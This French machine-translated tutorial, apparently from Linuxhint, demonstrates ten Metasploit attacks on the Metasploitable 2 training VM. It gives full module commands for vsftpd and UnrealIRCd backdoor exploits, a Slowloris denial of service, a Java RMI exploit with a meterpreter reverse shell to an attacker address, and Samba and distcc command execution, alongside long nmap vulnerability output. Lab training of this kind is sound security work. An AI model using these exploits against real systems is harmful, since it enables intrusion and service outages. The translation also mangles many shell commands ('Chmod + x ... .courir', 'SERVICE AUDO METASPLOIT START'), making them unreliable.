Top 10 des exemples d'utilisation des métasploit

Top 10 des exemples d'utilisation des métasploit
Metasploit est un cadre de sécurité qui est livré avec de nombreux outils d'exploitation du système et de test. Ce tutoriel montre 10 exemples d'attaques de piratage contre une cible Linux. La cible Linux est un environnement de formation métasploitable 2 OS, intentionnellement vulnérable pour que les utilisateurs apprennent à exploiter ses vulnérabilités. Ce tutoriel se concentre uniquement sur 10 attaques spécifiques de métasploit, pour plus d'informations sur l'installation métasploitable 2 en savoir plus ici.Pour commencer à télécharger Metasploit.

Dans mon cas, j'ai téléchargé Metasploit Pro Free Trial, mais vous pouvez en obtenir.
L'écran suivant nécessitera certaines de vos informations personnelles, remplissez-la pour passer à la page de téléchargement:

Télécharger Metasploit pour Linux:

Donnez au programme d'installation que vous venez de télécharger les droits d'exécution en fonctionnant:

# Chmod + x Metasploit-Latest-Linux-X64-Installer.courir

Exécutez ensuite Metasploit en fonctionnant:

# ./ Metasploit-Latest-Linux-X64-Installer.courir

Lorsque vous voyez une interface graphique d'installation, cliquez sur Avant continuer:

Dans l'écran suivant, acceptez l'accord de licence et cliquez sur Avant:

Laissez le répertoire par défaut et appuyez sur Avant:

Lorsqu'on lui a demandé si pour installer Metasploit en tant que service, la recommandation n'est pas, si vous le faites, le service Metasploit commencera à chaque fois que vous démarrez, si vous appuyez sur Non Le service Metasploit ne sera lancé que sur votre demande. Sélectionnez votre choix et appuyez sur Avance pour continuer:

Afin d'éviter les interférences, lorsque vous utilisez Metasploit, éteignez votre pare-feu, appuyez sur Avant continuer:

À moins que le port affiché ne soit déjà utilisé, appuyez sur Avant continuer:

Laissez localhost et presse Avant continuer:

Ensuite, pour procéder à l'installation, presse Avant Pour la dernière fois:

Le processus d'installation commencera:

Enfin, Metasploit a été installé, malgré le fait que nous n'allons pas travailler avec l'interface Web Metasploit, vous pouvez le marquer pour le garder disponible. Presse Finir finir.

Dépannage de Metasploit DB Erreur:

Dans mon cas, lorsque j'ai lancé Metasploit, il a renvoyé l'erreur:

 Aucune prise en charge de la base de données: Impossible de se connecter au serveur: la connexion refusée est le serveur exécuté sur l'hôte "LocalHost" (:: 1) et l'acceptation des connexions TCP / IP sur le port 7337? 

La raison de cette erreur est que la dépendance postgreSQL n'a pas été installée et le service Metasploit.

Pour le résoudre, fonctionne:

# apt installation -y postgresql

Puis démarrez PostgreSQL en fonctionnant:

# service sudo postgresql start

Et enfin commencer le service Metasploit:

# SERVICE AUDO METASPLOIT START

MAINTENANT msfconsole Encore une fois et vous remarquerez que l'erreur a disparu et nous sommes prêts à attaquer Metasploitable 2:

Utilisation de Metasploit pour scanner une cible pour les vulnérabilités:

La première étape consiste à scanner notre objectif pour découvrir des services et des vulnérabilités. Afin d'y parvenir, nous utiliserons NMAP à partir de Metasploit et son script Vuln NSE (NMAP Scripting Engine) utilisé pour détecter les vulnérabilités:

# db_nmap -v - script vuln 192.168.0.184

NOTE: remplacer 192.168.0.184 pour votre adresse IP cible ou votre hôte.

Analysons la sortie de NMAP:

IMPORTANT: La sortie NMAP contenait plus de 4000 lignes, la sortie a donc été raccourcie, laissant les informations pertinentes à expliquer.

Les lignes suivantes nous montrent simplement les types de scan initialisés qui impliquent le NSE, le scanner Ping ARP, la résolution DNS et une analyse de furtivité SYN. Toutes ces étapes étaient déjà clairement expliquées à Linuxhint.com at nping et nmap arp scan, en utilisant des scripts NMAP et une analyse furtive NMAP.

Notez que NSE contient des pré-exécutions, pendant l'exécution de la numérisation et les scripts post-exécution qui s'exécutent avant, pendant et après le processus de balayage démarre et se termine.

 msf5> db_nmap -v - script vuln 192.168.0.184 [*] NMAP: Démarrage Nmap 7.70 (https: // nmap.org) au 2020-02-04 16:56 -03 [*] NMAP: NSE: chargé 103 scripts pour la numérisation. [*] Nmap: nse: script pré-scanning. [*] NMAP: Initiez NSE à 16:56 [*] NMAP: NSE terminée à 16:57, 10.00S Eapsed [*] NMAP: Initiez NSE à 16:57 [*] NMAP: NSE terminée à 16:57, 0.00S Eapsed [*] NMAP: Initiat ARP Ping Scan à 16:57 [*] NMAP: numérisation 192.168.0.184 [1 port] [*] NMAP: scan Ping ARP terminé à 16:57, 0.05s écoulé (1 hôtes totaux) [*] NMAP: initiation de résolution DNS parallèle de 1 hôte. à 16:57 [*] NMAP: Résolution DNS parallèle terminée de 1 hôte. à 16h57, 0.02s écouté [*] NMAP: Initiver Syn Stealth Scan à 16:57 [*] NMAP: SCANNING 192.168.0.184 [1000 ports] 

Le prochain extrait montre quels services sont disponibles sur notre cible:

 [*] NMAP: Port ouvert découvert 25 / TCP sur 192.168.0.184 [*] NMAP: découvert le port ouvert 80 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 445 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 139 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 3306 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 5900 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 22 / TCP sur 192.168.0.184 [*] NMAP: découvert le port ouvert 53 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 111 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 21 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 23 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 1099 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 512 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 1524 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 513 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 514 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 2121 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 6000 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 2049 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 6667 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 8009 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 5432 / TCP sur 192.168.0.184 [*] NMAP: Port ouvert découvert 8180 / TCP sur 192.168.0.184 [*] NMAP: SYN SYTING SYN terminé à 16:57, 0.12s écoulés (1000 ports au total) 

Le rapport d'extrait suivant NSE Post Scan Scripts Exécution Pour trouver des vulnérabilités:

 [*] NMAP: NSE: scintillement script 192.168.0.184. [*] NMAP: Initiez NSE à 16:57 [*] NMAP: NSE terminée à 17:02, 322.44S Eapsed [*] NMAP: Initiez NSE à 17:02 [*] NMAP: NSE terminé à 17:02, 0.74S a écouté [*] NMAP: NMAP SCAN RAPPORT pour 192.168.0.184 [*] nmap: l'hôte est en place (0.00075s latence). [*] NMAP: Non illustré: 977 PORTS CLOST 

Comme vous pouvez le voir, NMAP a déjà trouvé des trous de sécurité ou des vulnérabilités sur le service FTP cible, il relie même les exploits américains pour pirater la cible:

 [*] NMAP: Port State Service [*] NMAP: 21 / TCP Open FTP [*] NMAP: | ftp-vsftpd-backdoor: [*] nmap: | Vulnérable: [*] nmap: | VSFTPD Version 2.3.4 porte arrière [*] NMAP: | État: vulnérable (exploitable) [*] nmap: | IDS: OSVDB: 73573 CVE: CVE-2011-2523 [*] NMAP: | VSFTPD Version 2.3.4 porte arrière, cela a été signalé le 2011-07-04. [*] Nmap: | Date de divulgation: 2011-07-03 [*] NMAP: | Résultats d'exploitation: [*] nmap: | Commande de shell: id [*] nmap: | Résultats: uid = 0 (root) gid = 0 (root) [*] nmap: | Références: [*] nmap: | http: // ScaryBeastsSecurity.blogspot.com / 2011/07 / alert-vsftpd-download-backDoored.html [*] nmap: | http: // osvdb.org / 73573 [*] nmap: | https: // github.com / Rapid7 / Metasploit-Framework / Blob / Master / Modules / Exploits / Unix / FTP / VSFTPD_234_BACKDOOR.rb [*] nmap: | _ https: // cve.mitre.org / cgi-bin / cvename.CGI?nom = CVE-2011-2523 

Vous trouverez ci-dessous, en plus des trous de sécurité FTP, les vulnérabilités SSL détectées par NMAP:

[*] Nmap: | _sslv2-drown: [*] nmap: 22 / tcp open ssh [*] nmap: 23 / tcp open telnet [*] nmap: 25 / tcp open smtp [*] nmap: | SMTP-VULN-CVE2010-4344: [*] NMAP: | _ Le serveur SMTP n'est pas exim: non vulnérable [*] nmap: | SSL-DH-PARAMS: [*] NMAP: | Vulnérable: [*] nmap: | Vulnérabilité anonyme Difffie-Hellman Key Exchange MITM [*] NMAP: | État: vulnérable [*] nmap: | Services de sécurité de la couche de transport (TLS) qui utilisent un [*] NMAP anonyme: | Diffie-Hellman Key Exchange offre uniquement une protection contre le [*] NMAP passif: | Écoute, et sont vulnérables aux attaques actives de l'homme dans le milieu [*] NMAP: | ce qui pourrait compromettre complètement la confidentialité et l'intégrité [*] nmap: | de toutes les données échangées sur la session résultante. [*] Nmap: | Vérifiez les résultats: [*] NMAP: | Anonyme DH Groupe 1 [*] NMAP: | Cipher Suite: TLS_DH_ANON_WITH_AES_256_CBC_SHA [*] nmap: | Type de module: SAFE Prime [*] NMAP: | Source du module: PostFix intégrée [*] nmap: | Longueur du module: 1024 [*] nmap: | Longueur du générateur: 8 [*] nmap: | Longueur de clé publique: 1024 [*] NMAP: | Références: [*] nmap: | https: // www.IETF.org / rfc / rfc2246.txt [*] nmap: | [*] Nmap: | Protocole de sécurité de la couche de transport (TLS) DHE_EXPORT CIPHERS DUCHAGE MITM (LOGJAM) [*] NMAP: | État: vulnérable [*] nmap: | IDS: OSVDB: 122331 CVE: CVE-2015-4000 [*] NMAP: | Le protocole de sécurité de la couche de transport (TLS) contient une faille qui est [*] nmap: | déclenché lors de la gestion des échanges de clés Diffie-Hellman définis avec [*] nmap: | Le chiffre Dhe_export. Cela peut permettre à un attaquant homme dans le milieu [*] NMAP: | Pour rétrograder la sécurité d'une session TLS à 512 bits d'exportation [*] NMAP: | La cryptographie, qui est beaucoup plus faible, permettant à l'attaquant [*] nmap: | Pour briser plus facilement le chiffrement et surveiller ou affronter [*] nmap: | le flux crypté. [*] Nmap: | Date de divulgation: 2015-5-19 [*] NMAP: | Vérifiez les résultats: [*] NMAP: | Export-grade DH Groupe 1 [*] NMAP: | Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA [*] NMAP: | Type de module: SAFE Prime [*] NMAP: | Source du module: inconnu / généré sur mesure [*] nmap: | Longueur du module: 512 [*] NMAP: | Longueur du générateur: 8 [*] nmap: | Longueur de clé publique: 512 [*] NMAP: | Références: [*] nmap: | https: // faibledh.org [*] nmap: | http: // osvdb.org / 122331 [*] nmap: | https: // cve.mitre.org / cgi-bin / cvename.CGI?Nom = CVE-2015-4000 [*] NMAP: | [*] Nmap: | Diffie-Hellman Key Échange de force de groupe insuffisante [*] NMAP: | État: vulnérable [*] nmap: | Services de sécurité de la couche de transport (TLS) qui utilisent des groupes Diffie-Hellman [*] NMAP: | de force insuffisante, en particulier celles qui utilisent l'un des rares [*] nmap: | des groupes partagés, peuvent être sensibles aux attaques passives d'écoute. [*] Nmap: | Vérifiez les résultats: [*] NMAP: | Faible groupe DH 1 [*] NMAP: | Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA [*] NMAP: | Type de module: SAFE Prime [*] NMAP: | Source du module: PostFix intégrée [*] nmap: | Longueur du module: 1024 [*] nmap: | Longueur du générateur: 8 [*] nmap: | Longueur de clé publique: 1024 [*] NMAP: | Références: [*] nmap: | _ https: // faibledh.org [*] nmap: | SSL-Poodle: [*] NMAP: | Vulnérable: [*] nmap: | SSL POODLE INFORMATION DES INFORMATIONS [*] NMAP: | État: vulnérable [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Le protocole SSL 3.0, comme utilisé dans OpenSSL à 1.0.1i et autres [*] nmap: | Produits, utilise un rembourrage CBC non déterministe, ce qui le rend plus facile [*] nmap: | Pour les attaquants de l'homme au milieu, pour obtenir des données en texte clair via un [*] nmap: | Padding-Oracle Attack, alias le problème "caniche". [*] Nmap: | Date de divulgation: 2014-10-14 [*] NMAP: | Vérifiez les résultats: [*] NMAP: | Tls_rsa_with_aes_128_cbc_sha [*] nmap: | Références: [*] nmap: | https: // cve.mitre.org / cgi-bin / cvename.CGI?Nom = CVE-2014-3566 [*] NMAP: | https: // www.OpenSSL.org / ~ bodo / ssl-poodle.pdf [*] nmap: | https: // www.impérialviolet.org / 2014/10/14 / caniche.html [*] nmap: | _ http: // osvdb.org / 113251 [*] nmap: | SSLV2-DROWN: [*] NMAP: | Ciphers: [*] nmap: | Ssl2_rc4_128_export40_with_md5 [*] nmap: | Ssl2_des_192_ede3_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_export40_with_md5 [*] nmap: | Ssl2_rc4_128_with_md5 [*] nmap: | Ssl2_des_64_cbc_with_md5 [*] nmap: | Vulns: [*] nmap: | CVE-2016-0703: [*] NMAP: | Titre: OpenSSL: Récupération des clés de la session divisée et conquéraire dans sslv2 [*] nmap: | État: vulnérable [*] nmap: | IDS: [*] NMAP: | CVE: CVE-2016-0703 [*] NMAP: | Description: [*] nmap: | La fonction get_client_master_key dans s2_srvr.C dans l'implémentation SSLV2 dans [*] nmap: | OpenSSL avant 0.9.8zf, 1.0.0 avant 1.0.0r, 1.0.1 avant 1.0.1m et 1.0.2 avant [*] nmap: | 1.0.2A accepte une valeur de longueur claire non nulle non nulle pour une [*] NMAP arbitraire: | Cipher, qui permet aux attaquants de l'homme au milieu de déterminer la valeur de clé maître [*] NMAP: | et décrypter les données TLS CipherText en tirant parti d'un Bleichenbacher RSA Padding Oracle, A [*] nmap: | Numéro connexe au CVE-2016-0800. [*] Nmap: | [*] Nmap: | Réfs: [*] nmap: | https: // cve.mitre.org / cgi-bin / cvename.CGI?Nom = CVE-2016-0703 [*] NMAP: | https: // www.OpenSSL.org / news / secadv / 20160301.SMS 

L'extrait suivant montre que de nombreuses vulnérabilités ont été trouvées dans le serveur Web, y compris l'accès à des pages de connexion sensées et aux vulnérabilités de déni de service.

 [*] NMAP: 53 / TCP Open Domain [*] NMAP: 80 / TCP Open HTTP [*] NMAP: | http-csrf: [*] nmap: | Araignée limitée à: maxdepth = 3; maxpageCount = 20; Inhost = 192.168.0.184 [*] nmap: | Trouvé les vulnérabilités CSRF possibles suivantes: [*] NMAP: | [*] Nmap: | Chemin: http: // 192.168.0.184: 80 / dvwa / [*] nmap: | ID de formulaire: [*] nmap: | Action de formulaire: Connexion.php [*] nmap: | [*] Nmap: | Chemin: http: // 192.168.0.184: 80 / DVWA / Connexion.php [*] nmap: | ID de formulaire: [*] NMAP: | _ Formulaire Action: Connexion.php [*] nmap: | _http-dombed-xss: je n'ai trouvé aucun xs basé sur DOM. [*] Nmap: | http-enum: [*] nmap: | / tikiwiki /: tikiwiki [*] nmap: | / Test /: Page de test [*] NMAP: | / phpinfo.PHP: Fichier d'informations possible [*] NMAP: | / phpmyadmin /: phpmyadmin [*] nmap: | / doc /: répertoire potentiellement intéressant avec inscription sur 'apache / 2.2.8 (Ubuntu) dav / 2 '[*] nmap: | / icônes /: dossier potentiellement intéressant avec listing de répertoire [*] nmap: | _ / index /: dossier potentiellement intéressant [*] nmap: | http-slowloris-check: [*] nmap: | Vulnérable: [*] nmap: | Attaque de Slowloris DOS [*] NMAP: | État: Probablement vulnérable [*] NMAP: | IDS: CVE: CVE-2007-6750 [*] NMAP: | Slowloris essaie de garder de nombreuses connexions au serveur Web cible ouvert et maintenir [*] nmap: | ils s'ouvrent le plus longtemps possible. Il accomplit cela en ouvrant des connexions à [*] nmap: | le serveur Web cible et l'envoi d'une demande partielle. Ce faisant, il affame [*] nmap: | Les ressources du serveur HTTP provoquant le déni de service. [*] Nmap: | [*] Nmap: | Date de divulgation: 2009-09-17 [*] NMAP: | Références: [*] nmap: | http: // ha.ckers.org / slowloris / [*] nmap: | _ https: // cve.mitre.org / cgi-bin / cvename.CGI?nom = CVE-2007-6750 

À ce stade, NMAP a trouvé beaucoup de vulnérabilités d'injection SQL, la quantité de vulnérabilités était si grande pour ce tutoriel que j'ai enlevé beaucoup d'entre eux et en avons laissé certains:

 [*] Nmap: | HTTP-SQL-Injection: [*] nmap: | SQLI possible pour les requêtes: [*] nmap: | http: // 192.168.0.184: 80 / dav /?C = n% 3bo% 3dd% 27% 20or% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / dav /?C = S% 3BO% 3DA% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / dav /?C = M% 3BO% 3DA% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / dav /?C = D% 3BO% 3DA% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?Page = Pen-test-Tool-Lookup.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?Page = documentation% 2fvulnerabilités.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?page = capture-data.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?Page = Text-File-Viewer.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / mutillidae /?page = add-to-blog.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / mutillidae /?page = show-log.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?page = enregistrer.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?Page = HTML5-Storage.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?page = utilisateur-info.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?page = maison.php & do = toggle-hents% 27% 20or% 20SqlSpider [*] nmap: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?page = show-log.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?Page = notes.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?page = cadrage.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?Page = PHP-Errors.PHP% 27% 20OR% 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80 / Mutillidae / Index.php?page = maison.Php & DO = Toggle-Security% 27% 20or% 20SQLSPIDER 

En dessous de NMAP rejette à nouveau les vulnérabilités XSS (comme dans le premier extrait), et rapporte

Invocation de méthode distante (RMI) Trouns de sécurité Durée de configuration incorrecte permettant à un attaquant d'autoriser l'exécution du code Java malveillant:

 . [*] Nmap: | _http-trace: la trace est activée [*] nmap: | _http-vuln-cve2017-1001000: erreur: l'exécution du script a échoué (use -d pour déboguer) [*] nmap: 111 / tcp open rpcbind [ *] Nmap: 139 / tcp ouvert netbios-ssn [*] nmap: 445 / tcp ouvert Microsoft-dd [*] nmap: 512 / tcp ouvert exec [*] nmap: 513 / tcp open ligin [*] nmap: 514 / TCP Open Shell [*] NMAP: 1099 / TCP Open RMiregistry [*] NMAP: | RMI-Vuln-Classloader: [*] nmap: | Vulnérable: [*] nmap: | Registre RMI Configuration par défaut Vulnérabilité Exécution du code distant [*] NMAP: | État: vulnérable [*] nmap: | La configuration par défaut du registre RMI permet de charger des classes à partir d'URL distantes qui peuvent conduire à l'exécution du code distant. [*] Nmap: | [*] Nmap: | Références: [*] nmap: | _ https: // github.com / Rapid7 / Metasploit-Framework / Blob / Master / Modules / Exploits / Multi / Misc / Java_Rmi_Server.RB 

Ci-dessous, vous pouvez voir des vulnérabilités SSL supplémentaires ont été trouvées:

 [*] Nmap: | ssl-ccs-injection: [*] nmap: | Vulnérable: [*] nmap: | Vulnérabilité SSL / TLS MITM (injection CCS) [*] NMAP: | État: vulnérable [*] nmap: | Facteur de risque: élevé [*] NMAP: | OpenSSL avant 0.9.8za, 1.0.0 avant 1.0.0m et 1.0.1 avant 1.0.1h [*] nmap: | Ne restreint pas correctement le traitement des messages ChangeCipherspec, [*] nmap: | ce qui permet aux attaquants de l'homme au milieu de déclencher l'utilisation d'un zéro [*] nmap: | Longueur Master Key dans certaines communications OpenSSL-OpenSSL, et [*] nmap: | Par conséquent, détourner les sessions ou obtenir des informations sensibles, via [*] nmap: | Une poignée de main TLS fabriquée, alias la vulnérabilité "CCS Injection". [*] Nmap: | [*] Nmap: | Références: [*] nmap: | https: // cve.mitre.org / cgi-bin / cvename.CGI?name = CVE-2014-0224 [*] nmap: | http: // www.cvedetails.com / cve / 2014-0224 [*] nmap: | _ http: // www.OpenSSL.org / news / secadv_20140605.txt [*] nmap: | SSL-DH-PARAMS: [*] NMAP: | Vulnérable: [*] nmap: | Diffie-Hellman Key Échange de force de groupe insuffisante [*] NMAP: | État: vulnérable [*] nmap: | Services de sécurité de la couche de transport (TLS) qui utilisent des groupes Diffie-Hellman [*] NMAP: | de force insuffisante, en particulier celles qui utilisent l'un des rares [*] nmap: | des groupes partagés, peuvent être sensibles aux attaques passives d'écoute. [*] Nmap: | Vérifiez les résultats: [*] NMAP: | Faible groupe DH 1 [*] NMAP: | Cipher Suite: tls_dhe_rsa_with_aes_128_cbc_sha [*] nmap: | Type de module: SAFE Prime [*] NMAP: | Source du module: inconnu / généré sur mesure [*] nmap: | Longueur du module: 1024 [*] nmap: | Longueur du générateur: 8 [*] nmap: | Longueur de clé publique: 1024 [*] NMAP: | Références: [*] nmap: | _ https: // faibledh.org [*] nmap: | SSL-Poodle: [*] NMAP: | Vulnérable: [*] nmap: | SSL POODLE INFORMATION DES INFORMATIONS [*] NMAP: | État: vulnérable [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Le protocole SSL 3.0, comme utilisé dans OpenSSL à 1.0.1i et autre 

Le prochain extrait montre que notre cible est peut-être infectée par un troyen contre un service IRC:

 [*] NMAP: | _IRC-UNREALIRCD-BACKDOOR: ressemble à une version trojane d'UnreArcd. Voir http: // seclists.org / fulldisclosure / 2010 / juin / 277 [*] NMAP: 8009 / TCP Open AJP13 

L'extrait suivant montre que le drapeau httponly n'est pas correctement configuré, par conséquent, la cible est vulnérable aux attaques de scripts inter-sites:

 [*] Nmap: 8180 / tcp ouvert inconnu [*] nmap: | Http-Cookie-Flags: [*] nmap: | / admin /: [*] nmap: | JSessionId: [*] nmap: | httponly ne se définit pas [*] nmap: | / admin / index.html: [*] nmap: | JSessionId: [*] nmap: | httponly ne se définit pas [*] nmap: | / admin / connexion.html: [*] nmap: | JSessionId: [*] nmap: | httponly ne se définit pas [*] nmap: | / admin / admin.html: [*] nmap: | JSessionId: [*] nmap: | httponly ne se définit pas [*] nmap: | / admin / compte.html: [*] nmap: | JSessionId: [*] nmap: | httponly ne se définit pas [*] nmap: | / admin / admin_login.html: [*] nmap: | JSessionId: [*] nmap: | httponly ne se définit pas [*] nmap: | / Admin / Home.HTML: 

L'extrait suivant énumère ou répertorie les répertoires accessibles trouvés intéressants sur notre cible:

 [*] Nmap: | http-enum: [*] nmap: | / admin /: dossier d'administration possible [*] nmap: | / admin / index.html: dossier d'administration possible [*] nmap: | / admin / connexion.html: dossier d'administration possible [*] nmap: | / admin / admin.html: dossier d'administration possible [*] nmap: | / admin / compte.html: dossier d'administration possible [*] nmap: | / admin / admin_login.html: dossier d'administration possible [*] nmap: | / Admin / Home.html: dossier d'administration possible [*] nmap: | / admin / admin-login.html: dossier d'administration possible [*] nmap: | / admin / adminlogin.html: dossier d'administration possible [*] nmap: | / admin / ControlPanel.html: dossier d'administration possible [*] nmap: | / admin / cp.html: dossier d'administration possible [*] nmap: | / admin / index.JSP: dossier d'administration possible 

Enfin, le scan se termine et le NSE post-balayage est exécuté:

 [*] Nmap: | [*] Nmap: | Date de divulgation: 2009-09-17 [*] NMAP: | Références: [*] nmap: | http: // ha.ckers.org / slowloris / [*] nmap: | _ https: // cve.mitre.org / cgi-bin / cvename.CGI?name = CVE-2007-6750 [*] NMAP: Adresse MAC: 08: 00: 27: DD: 87: 8C (Oracle VirtualBox Virtual Nic) [*] NMAP: Résultats du script hôte: [*] NMAP: | _SMB-VULN -MS10-054: False [*] nmap: | _smb-vuln-ms10-061: false [*] nmap: nse: script post-scanning. [*] NMAP: Initiez NSE à 17:02 [*] NMAP: NSE terminée à 17:02, 0.00S Eapsed [*] NMAP: Inititing NSE à 17:02 [*] NMAP: NSE terminée à 17:02, 0.00S Eapsed [*] NMAP: Lire les fichiers de données à partir de: / opt / métasploit / commun / share / nmap / [*] nmap: nmap fait: 1 adresse IP (1 hôte) scanné en 333.96 secondes [*] nmap: paquets bruts envoyés: 1001 (44.028KB) | RCVD: 1001 (40.120KB) MSF5> 

Maintenant, nous avons identifié des trous de sécurité pour attaquer notre cible.

Utilisation de Metasploit pour pirater un serveur FTP:

Une fois que vous avez identifié des trous de sécurité sur votre cible Utilisez les commandes Metasploit pour trouver des exploits appropriés contre eux. Comme vous l'avez vu précédemment, l'une des premières vulnérabilités trouvées était sur le serveur VSFTPD, pour trouver des exploits appropriés, dans Metasploit RUN:

# Recherche vsftpd

Comme vous le voyez, Metasploit contient une porte dérobée qui peut nous aider à pirater notre FTP cible. Pour utiliser cet exploit, dans Metasploit Run:

# Utilisez Exploit / Unix / FTP / VSFTPD_234_BACKDOOR

Pour apprendre à utiliser une exécution d'exploits spécifique:

# Afficher les options

Comme vous le voyez ci-dessus, cet exploit contient 2 options, des Rosts (hôte distant) et RPORT. Nous devons spécifier le ROST, le port est déjà spécifié (21).
Pour définir l'hôte distant (RHOST) définissant l'exécution IP cible:

# Set Rhost 192.168.0.184

Une fois défini, la cible exécute la commande suivante pour exploiter le trou de sécurité:

# exploiter

Comme vous pouvez le voir, j'ai obtenu un shell dans la cible, lors de l'exécution de «LS», je peux voir les fichiers cibles, l'attaque a réussi. Pour quitter la cible, il suffit de courir:

#sortie

Utilisation de Metasploit pour l'attaque DOS:

Comme vous l'avez vu pendant le processus de balayage, une vulnérabilité DOS Slowloris a été trouvée, afin de trouver comment l'exploiter, suivez les étapes précédentes pour rechercher un outil approprié, dans ce cas un module auxiliaire au lieu d'un exploit:

# Rechercher Slowloris

Une fois que nous avons trouvé un outil à attaquer, courez:

# Utilisez lesiliaire / dos / http / slowloris
# Set Rhost 192.168.0.184

Ensuite, tapez:

# courir

Vous remarquerez que l'attaque s'exécute, le service HTTP cible ne sera pas disponible, il continue de charger:

Une fois que nous arrêtons l'attaque en appuyant Ctrl+C Le serveur sera à nouveau disponible:

Utilisation de Metasploit pour pirater un serveur IRC:

Le chat de relais Internet est largement utilisé dans le monde.

Répétons les étapes pour trouver un outil pour le pirater:

# Rechercher Unreal IRCD
# Utilisez Exploit / Unix / IRC / Unreal_IRCD_3281_BACKDOOR
# Afficher les options
# Set Rhost 192.168.0.184

Puis courez:

# exploiter

Et comme vous pouvez le revoir, nous avons une session de shell dans la cible.

Utilisation de Metasploit pour exécuter le code malveillant Java:

# Utiliser Exploit / Multi / Misc / Java_Rmi_Server
# Afficher les options
# Set Rhost 192.168.0.184
# Afficher les charges utiles
# Set Payload Java / Meterpreter / Reverse_TCP
# set lhost 192.168.0.50
# exploiter

Utilisation de Metasploit pour pirater la vulnérabilité du script Samba Usermap:

Certaines étapes comme la recherche d'exploits seront omises pour éviter un énorme tutoriel. Pour exploiter cette course de vulnérabilité:

# Utiliser l'exploit / multi / samba / usermap_script
# Afficher les options

Définissez l'IP cible et exploitez-le en exécutant:

# Set Rhost 192.168.0.184
# exploiter

Comme vous pouvez le voir, nous avons gagné une coquille dans notre cible.

Utilisation de Metasploit pour exploiter l'exécution de la commande DISTCC Daemon:

Cette vulnérabilité est expliquée ici.

Pour commencer à courir:

# Utiliser Exploit / Unix / Misc / Distcc_Exec

Puis courez:

# Set Rhost 192.168.0.184
# exploiter

Comme vous pouvez le voir, nous avons à nouveau accédé à la cible.

Utilisation de Metasploit pour la numérisation de port (voie supplémentaire sans NMAP):

Effectuer un scan TCP avec Metasploit:

Pour exécuter une analyse différente sans utiliser NMAP Metasploit propose des alternatives que vous pouvez trouver en fonctionnant:

# Rechercher PortScan

Pour effectuer une analyse TCP:

# Utilisez le scanner / PortScan / TCP
# Set Rhost 192.168.0.184

Pour voir des options supplémentaires:

# Afficher les options

Choisissez la plage de port que vous souhaitez scanner en fonctionnant:

# Set Ports 21-35

Ensuite, exécutez le scan en exécutant:

# courir

Comme vous pouvez le voir, les ports 22,25,23 et 21 ont été trouvés ouverts.

Effectuer un scan SYN avec Metasploit:

Pour un analyse SYN:

# Utilisez lesiliaire / scanner / portscan / syn
# Set Rhost 192.168.0.184
# Set Ports 80
# courir

Comme vous pouvez le voir, le port 80 a été trouvé ouvert.

CONCLUSION

Metasploit est comme un couteau armée suisse, il a tellement de fonctions. J'espère que vous avez trouvé ce tutoriel sans métasploit utile. Continuez à suivre Linuxhint pour plus de conseils et de mises à jour sur Linux et le réseautage.